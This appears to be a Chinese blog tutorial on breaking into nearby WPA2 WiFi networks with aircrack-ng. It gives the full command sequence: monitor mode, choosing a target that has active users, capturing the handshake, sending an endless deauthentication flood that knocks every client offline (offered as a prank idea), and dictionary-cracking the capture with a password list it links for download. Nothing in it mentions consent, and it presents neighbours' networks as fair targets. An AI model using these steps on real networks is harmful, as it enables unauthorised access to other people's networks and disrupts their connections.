linux 下使用 Aircrack-ng 破解WiFi密码，暴力破解

暴力破解概述

1：穷举法是一种针对于密码的破译方法。这种方法很像数学上的“完全归纳法”并在密码破译方面得到了广泛的应用。简单来说就是将密码进行逐个推算直到找出真正的密码为止。比如一个四位并且全部由数字组成其密码共有10000种组合，也就是说最多我们会尝试9999次才能找到真正的密码。利用这种方法我们可以运用计算机来进行逐个推算，也就是说用我们破解任何一个密码也都只是一个时间问题
2：当然如果破译一个有8位而且有可能拥有大小写字母、数字、以及符号的密码用普通的家用电脑可能会用掉几个月甚至更多的时间去计算，其组合方法可能有几千万亿种组合。这样长的时间显然是不能接受的。其解决办法就是运用字典，所谓“字典”就是给密码锁定某个范围，比如英文单词以及生日的数字组合等，所有的英文单词不过10万个左右这样可以大大缩小密码范围，很大程度上缩短了破译时间

使用环境：

1：使用linux系统操作
2：周围有wifi
3：你要攻击的wifi有人在使用（即至少有一个人正在连着该wifi）

破解wifi密码操作步骤

1： 通过aircrack-ng 工具，将网卡改为监听模式
2 ：确定目标WiFi 的信息，比如mac 地址和信道，连接数等等
3 ：模拟无线，抓取密码信息
4：确定目标用户，对其发动攻击
5：得到加密的无线信息并进行破解(通过密码字典)
步骤就是这样了，接下来我来破解下附近的WiFi

WiFi密码破解步骤演示

1：使用ifconfig查询ip无线网卡名称（一般是wlan0，我的是wlp2s0）

2:开启无线网卡的监听模式

sudo airmon-ng start wlp2s0

如图所示，网卡名称可能会发生改变（增加了mon），此时为监听模式，注意：此时电脑无法连接wifi，如果发现电脑设置里面无线连接消失了，是正常的，破解完wifi密码后，关闭监听模式无线连接就重新出现了

3：扫描目标WiFi

sudo airodump-ng wlp2s0mon

图中标记的红色框是干嘛的：
Data 当前wifi数据大小，有数据就表明有人正在使用，你就可以把它作为一个选择了。
经过观察之后选择一个你想破解或者攻击的wifi，前提是它得有数据显示，Data的那列，所以选择攻击的wifi最好先从Data看起来，选择一个有数据（数据越大越好）的wifi之后按Ctrl+c 停止检测，复制你选择的Mac地址。

现在我们要确认一些信息，及目标AP（就是WiFi，以下简称AP） 的MAC 地址，AP 的信道和加密方式：
BSSID：目标AP的MAC地址（WiFi路由器的） 图中蓝色框
CH（信道）：1 图中黄色框
加密方式：WPA2
我们只需要这些信息就足够了

4：模拟WiFi 信号抓包

sudo airodump-ng --ivs -c 11 --bssid  B4:B6:76:69:39:EF  -w ~/Desktop/cap/hahaha wlp2s0mon

–ivs ：指定生成文件的格式，这里格式是ivs（比如：hahaha.ivs）
-w ：指定文件的名称叫什么，这里叫hahaha
–bssid ：目标AP的MAC地址
-c ：指定我们模拟的WiFi的信道，这里是11

5:进行洪水攻击，保持上面的窗口不要关闭，重新开一个窗口输入命令

sudo aireplay-ng -0 0 -a B4:B6:76:69:39:EF  wlp2s0mon

0 表示不断攻击 ，这个命令也可以理解为：让当前路由下的所有连接断开，要是搞恶作剧的话你可以试试哈！

注意黄色框的位置，如果在发送攻击数据包之后出现了黄色框的信息，那么就是密码信息抓取成功了，如果出现了这个的话就可以结束WiFi 模拟了，我们可以按Ctrl+C 然后查看我们指定的目录会发现多了一个hahaha-01.ivs 文件，我们想要的密码就在这个文件里，不过是加密的，所有我们还需要通过密码字典把密码破解出来

注：1：如果一直不出现，就再换一个wifi攻击，尽量挑选Data值高的攻击，如果Data为0，不可能成功。 2：有的时候会报下图这种错误，我也不知道为什么，多执行几次就好了。如果有知道的，可以留言给我，谢谢。

6：指定密码本来破解此文件

sudo aircrack-ng -w ~/Desktop/cap/password.txt ~/Desktop/cap/hahaha-01.ivs

~/Desktop/cap/password.txt ：是密码本路径
~/Desktop/cap/hahaha-01.ivs：是抓取的包
注意：如果wifi密码很复杂，比如数字字母特殊字符都有，可能需要破解很长时间，甚至破解不出来，跟字典也有关系，不过一般来说，谁家密码那么复杂，根据我个人使用，大部分都可以破解，但是带特殊字符的基本上破解不了，纯数字的几秒就破解了，字母加数字的一般也都能破解，只是要花点时间。。。

没有密码本可以下载我的：链接：https://pan.baidu.com/s/1bUKe37WUJQFt1Y6L0ZZtyA 密码：y3fi
密码本都不一样，越全越好。
这里看到红色箭头的位置就是密码了，到这里密码破解就完成了~

7关闭监听模式连接wifi

sudo airmon-ng stop wlp2s0mon